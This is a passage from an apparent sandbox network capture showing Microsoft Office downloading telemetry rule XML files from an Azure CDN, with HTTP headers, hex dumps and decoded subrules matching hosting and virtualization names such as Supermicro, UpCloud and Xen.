                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                    ETag: "0x8DC582B91EAD002"
                                                                    x-ms-request-id: ff288f8c-c01e-007a-5a0e-26b877000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130332Z-17c5cb586f6wmhkn5q6fu8c5ss00000004a000000000a9na
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache-Info: L1_T2
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:32 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    93192.168.2.44984813.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:32 UTC192OUTGET /rules/rule120671v0s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:32 UTC470INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:32 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 432
                                                                    Connection: close
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT
                                                                    ETag: "0x8DC582BAABA2A10"
                                                                    x-ms-request-id: 63249b2a-c01e-0046-2e2c-262db9000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130332Z-r197bdfb6b4jlq9hb8xf0re6t400000004zg00000000apek
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:32 UTC432INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    94192.168.2.44984913.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:32 UTC192OUTGET /rules/rule120672v0s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:32 UTC491INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:32 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 475
                                                                    Connection: close
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                    ETag: "0x8DC582BBA740822"
                                                                    x-ms-request-id: 8e6218f7-d01e-0066-7d57-27ea17000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130332Z-16849878b78wc6ln1zsrz6q9w800000004sg0000000081bd
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache-Info: L1_T2
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:32 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    95192.168.2.44985013.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:32 UTC192OUTGET /rules/rule120673v0s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:32 UTC470INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:32 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 427
                                                                    Connection: close
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT
                                                                    ETag: "0x8DC582BB464F255"
                                                                    x-ms-request-id: 48ec36c7-d01e-00a1-338d-2735b1000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130332Z-16849878b786fl7gm2qg4r5y7000000005d0000000004nfs
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:32 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    96192.168.2.44985113.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:32 UTC192OUTGET /rules/rule120674v0s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:33 UTC470INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:32 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 474
                                                                    Connection: close
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                    ETag: "0x8DC582BA4037B0D"
                                                                    x-ms-request-id: cfcfc7b9-001e-0065-0f5b-260b73000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130332Z-17c5cb586f6mkpfk79wxvcahc000000005c000000000azw4
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:33 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    97192.168.2.44985213.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:32 UTC192OUTGET /rules/rule120675v0s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:33 UTC470INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:33 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 419
                                                                    Connection: close
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                    ETag: "0x8DC582BA6CF78C8"
                                                                    x-ms-request-id: f9fbd553-601e-003e-5c2e-273248000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130333Z-16849878b785dznd7xpawq9gcn00000006f0000000008pnq
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:33 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    98192.168.2.44985413.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:33 UTC192OUTGET /rules/rule120677v0s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:33 UTC470INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:33 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 405
                                                                    Connection: close
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT
                                                                    ETag: "0x8DC582B942B6AFF"
                                                                    x-ms-request-id: 9577fd14-901e-0016-4fa3-26efe9000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130333Z-16849878b7898p5f6vryaqvp5800000005y00000000079d8
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:33 UTC405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    99192.168.2.44985313.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:33 UTC192OUTGET /rules/rule120676v0s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:33 UTC470INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:33 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 472
                                                                    Connection: close
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                    ETag: "0x8DC582B984BF177"
                                                                    x-ms-request-id: dc27e692-e01e-001f-1e67-281633000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130333Z-15b8d89586flspj6y6m5fk442w0000000awg0000000059un
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:33 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    100192.168.2.44985513.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:33 UTC192OUTGET /rules/rule120678v0s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:33 UTC470INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:33 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 468
                                                                    Connection: close
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                    ETag: "0x8DC582BBA642BF4"
                                                                    x-ms-request-id: fd0e08e6-201e-0085-5f27-2634e3000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130333Z-r197bdfb6b4jlq9hb8xf0re6t4000000050g00000000a46t
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:33 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    101192.168.2.44985613.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:33 UTC192OUTGET /rules/rule120679v0s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:33 UTC491INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:33 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 174
                                                                    Connection: close
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                    ETag: "0x8DC582B91D80E15"
                                                                    x-ms-request-id: 071448c9-d01e-0028-2702-297896000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130333Z-15b8d89586fx2hlt035xdehq580000000p0g000000001ct8
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache-Info: L1_T2
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:33 UTC174INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    102192.168.2.44985713.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:33 UTC192OUTGET /rules/rule120680v0s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:33 UTC584INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:33 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 1952
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                    ETag: "0x8DC582B956B0F3D"
                                                                    x-ms-request-id: bb28544f-801e-0047-7562-267265000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130333Z-16849878b78j5kdg3dndgqw0vg00000006w00000000019h1
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    X-Cache-Info: L1_T2
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:33 UTC1952INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    103192.168.2.44985813.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:33 UTC192OUTGET /rules/rule120681v0s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:34 UTC470INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:33 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 958
                                                                    Connection: close
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT
                                                                    ETag: "0x8DC582BA0A31B3B"
                                                                    x-ms-request-id: 080ba15e-001e-0082-732b-275880000000
